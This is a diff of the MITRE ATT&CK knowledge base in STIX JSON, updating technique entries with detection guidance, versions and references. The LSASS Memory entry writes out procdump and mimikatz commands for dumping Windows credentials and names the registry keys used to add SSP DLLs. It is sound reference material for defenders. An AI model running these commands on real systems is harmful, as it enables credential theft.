"kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "modified": "2020-03-20T15:42:48.595Z", - "created": "2017-05-31T21:31:16.408Z", - "x_mitre_version": "2.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_data_sources": [ "Process command-line parameters", "File monitoring", @@ -13273,16 +15684,7 @@ "Network protocol analysis", "Process monitoring" ], - "x_mitre_detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_is_subtechnique": false + "x_mitre_version": "2.0" }, { "id": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", @@ -13382,9 +15784,9 @@ "phase_name": "credential-access" } ], - "modified": "2020-03-24T21:29:13.900Z", + "modified": "2020-10-21T01:31:35.760Z", "created": "2017-05-31T21:30:48.323Z", - "x_mitre_version": "1.1", + "x_mitre_version": "1.2", "x_mitre_contributors": [ "John Lambert, Microsoft Threat Intelligence Center" ], @@ -13411,7 +15813,8 @@ "x_mitre_platforms": [ "Linux", "macOS", - "Windows" + "Windows", + "Network" ], "x_mitre_is_subtechnique": false }, @@ -13682,22 +16085,6 @@ "x_mitre_version": "1.0" }, { - "created": "2020-02-12T14:08:48.689Z", - "modified": "2020-03-28T19:34:47.546Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "execution" - } - ], - "type": "attack-pattern", - "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", - "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.", - "name": "Inter-Process Communication", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -13705,21 +16092,37 @@ "url": "https://attack.mitre.org/techniques/T1559" } ], - "x_mitre_platforms": [ - "Windows" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Inter-Process Communication", + "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.", + "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "modified": "2020-03-28T19:34:47.546Z", + "created": "2020-02-12T14:08:48.689Z", + "x_mitre_data_sources": [ + "Process monitoring", + "DLL monitoring", + "File monitoring" ], - "x_mitre_is_subtechnique": false, - "x_mitre_version": "1.0", - "x_mitre_detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.", "x_mitre_permissions_required": [ "Administrator", "User", "SYSTEM" ], - "x_mitre_data_sources": [ - "Process monitoring", - "DLL monitoring", - "File monitoring" + "x_mitre_detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows" ] }, { @@ -13774,6 +16177,22 @@ ] }, { + "created": "2020-03-14T23:08:20.244Z", + "modified": "2020-03-15T00:46:26.598Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", + "name": "Internal Proxy", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -13791,25 +16210,11 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Internal Proxy", - "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", - "id": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } - ], - "modified": "2020-03-15T00:46:26.598Z", - "created": "2020-03-14T23:08:20.244Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_data_sources": [ "Process use of network", "Process monitoring", @@ -13817,11 +16222,9 @@ "Netflow/Enclave netflow", "Packet capture" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", @@ -13844,7 +16247,7 @@ }, { "description": "THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019.", - "url": " https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6 ", + "url": "https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6", "source_name": "THE FINANCIAL TIMES LTD 2019." } ], @@ -13855,7 +16258,7 @@ "phase_name": "lateral-movement" } ], - "modified": "2020-03-31T22:13:33.718Z", + "modified": "2020-09-17T18:26:41.796Z", "created": "2019-09-04T19:26:12.441Z", "x_mitre_is_subtechnique": false, "x_mitre_data_sources": [ @@ -13885,6 +16288,22 @@ "x_mitre_version": "1.0" }, { + "created": "2020-02-10T19:49:46.752Z", + "modified": "2020-02-10T19:52:47.724Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.", + "name": "Invalid Code Signature", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -13897,34 +16316,18 @@ "description": "Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Invalid Code Signature", - "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.", - "id": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "modified": "2020-02-10T19:52:47.724Z", - "created": "2020-02-10T19:49:46.752Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.", "x_mitre_data_sources": [ "File monitoring", "Process monitoring", "Binary file metadata" ], - "x_mitre_platforms": [ - "macOS", - "Windows" - ] + "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "external_references": [ @@ -14061,7 +16464,8 @@ }, { "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", - "source_name": "SANS Attacking Kerberos Nov 2014" + "source_name": "SANS Attacking Kerberos Nov 2014", + "url": "https://redsiege.com/kerberoast-slides" }, { "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/", @@ -14081,7 +16485,7 @@ ], "revoked": true, "type": "attack-pattern", - "modified": "2020-02-11T20:35:32.042Z", + "modified": "2020-10-20T19:30:10.297Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -14098,6 +16502,11 @@ "external_id": "T1558.003", "url": "https://attack.mitre.org/techniques/T1558/003" }, + { + "external_id": "CAPEC-509", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/509.html" + }, { "url": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1", "description": "EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.", @@ -14125,7 +16534,8 @@ }, { "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", - "source_name": "SANS Attacking Kerberos Nov 2014" + "source_name": "SANS Attacking Kerberos Nov 2014", + "url": "https://redsiege.com/kerberoast-slides" }, { "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/", @@ -14140,7 +16550,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-02-27T18:25:30.124Z", + "modified": "2020-10-20T19:30:10.687Z", "created": "2020-02-11T18:43:38.588Z", "x_mitre_contributors": [ "Praetorian" @@ -14157,7 +16567,7 @@ "Windows" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "external_references": [ @@ -14425,7 +16835,7 @@ }, { "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "name": "Keylogging", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -14446,6 +16856,11 @@ "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf", "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", "source_name": "Adventures of a Keystroke" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." } ], "type": "attack-pattern", @@ -14459,15 +16874,16 @@ "phase_name": "credential-access" } ], - "modified": "2020-03-24T20:45:52.998Z", + "modified": "2020-10-21T01:30:56.227Z", "created": "2020-02-11T18:58:11.791Z", "x_mitre_platforms": [ "Windows", "macOS", - "Linux" + "Linux", + "Network" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", "x_mitre_permissions_required": [ "Administrator", @@ -14630,6 +17046,16 @@ "external_id": "T1574.006", "url": "https://attack.mitre.org/techniques/T1574/006" }, + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + }, + { + "external_id": "CAPEC-640", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/640.html" + }, { "source_name": "Man LD.SO", "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html", @@ -14671,7 +17097,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-15T21:59:25.358Z", + "modified": "2020-09-16T16:49:46.904Z", "created": "2020-03-13T20:09:59.569Z", "x_mitre_platforms": [ "Linux" @@ -14683,7 +17109,7 @@ ], "x_mitre_detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", @@ -15009,6 +17435,22 @@ "x_mitre_version": "1.0" }, { + "created": "2020-02-11T18:41:44.783Z", + "modified": "2020-06-09T20:46:00.393Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", + "name": "LSASS Memory", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -15036,39 +17478,23 @@ "source_name": "Powersploit" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "LSASS Memory", - "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", - "id": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "credential-access" - } - ], - "modified": "2020-06-09T20:46:00.393Z", - "created": "2020-02-11T18:41:44.783Z", - "x_mitre_contributors": [ - "Ed Williams, Trustwave, SpiderLabs" + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" ], "x_mitre_data_sources": [ "Process command-line parameters", "PowerShell logs", "Process monitoring" ], - "x_mitre_permissions_required": [ - "Administrator", - "SYSTEM" - ], - "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_platforms": [ - "Windows" + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs" ] }, { @@ -15296,6 +17722,16 @@ "external_id": "T1543.004", "url": "https://attack.mitre.org/techniques/T1543/004" }, + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, { "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", @@ -15335,12 +17771,12 @@ "phase_name": "privilege-escalation" } ], - "modified": "2020-03-25T22:27:49.609Z", + "modified": "2020-09-16T15:46:44.130Z", "created": "2020-01-17T19:23:15.227Z", "x_mitre_data_sources": [ "File monitoring" ], - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_effective_permissions": [ "root" @@ -15673,6 +18109,22 @@ ] }, { + "created": "2020-03-13T21:13:10.467Z", + "modified": "2020-05-26T19:23:54.854Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.", + "name": "Local Data Staging", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -15680,35 +18132,19 @@ "url": "https://attack.mitre.org/techniques/T1074/001" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Local Data Staging", - "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.", - "id": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "collection" - } - ], - "modified": "2020-05-26T19:23:54.854Z", - "created": "2020-03-13T21:13:10.467Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_data_sources": [ "Process command-line parameters", "Process monitoring", "File monitoring" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "created": "2020-02-19T18:46:06.098Z", @@ -16037,17 +18473,8 @@ ] }, { - "created": "2020-03-15T16:21:45.131Z", - "modified": "2020-03-26T20:28:00.985Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } - ], - "type": "attack-pattern", "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", - "description": "Adversaries may communicate using application layer protocols associated with electronic map delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 